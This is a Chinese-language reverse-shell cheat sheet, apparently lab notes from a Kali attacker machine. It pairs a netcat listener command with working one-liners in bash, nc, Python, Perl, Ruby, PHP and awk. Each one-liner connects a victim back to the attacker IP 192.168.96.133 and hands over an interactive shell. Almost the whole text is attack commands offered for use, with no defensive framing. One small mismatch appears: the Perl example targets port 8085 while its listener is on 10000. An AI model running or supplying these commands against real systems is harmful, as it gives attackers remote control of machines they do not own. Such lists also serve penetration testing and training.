一、
basn反弹
开启监听端口,被攻击者ip为攻击者的。kali为攻击者。
nc -lvvp 10000
bash -i >& /dev/tcp/192.168.96.133/10000 0>&1
nc反弹
nc -e /bin/bash 192.168.96.133 10000
虽然没有输入框,但其实已经反弹成功,
python反弹,需要有python环境。
nc -lvvp 10000 //攻击机
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.96.133",10000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
perl反弹
nc -lvvp 10000 //攻击机
perl -e '
use Socket;
$i="192.168.96.133";
$p=8085;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'
rubl反弹
nc -lvvp 10000 //攻击机
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.96.133","10000");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
同样没有输入框,但已经反弹成功,ifconfig验证。
php反弹
nc -lvvp 10000 //攻击机
php -r '$sock=fsockopen("192.168.96.133",10000);exec("/bin/bash -i <&3 >&3 2>&3");'
awk反弹
nc -lvvp 10000 //攻击机
awk 'BEGIN{s="/inet/tcp/0/192.168.96.133/10000";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
每种方式的反弹都需要相应的配置环境。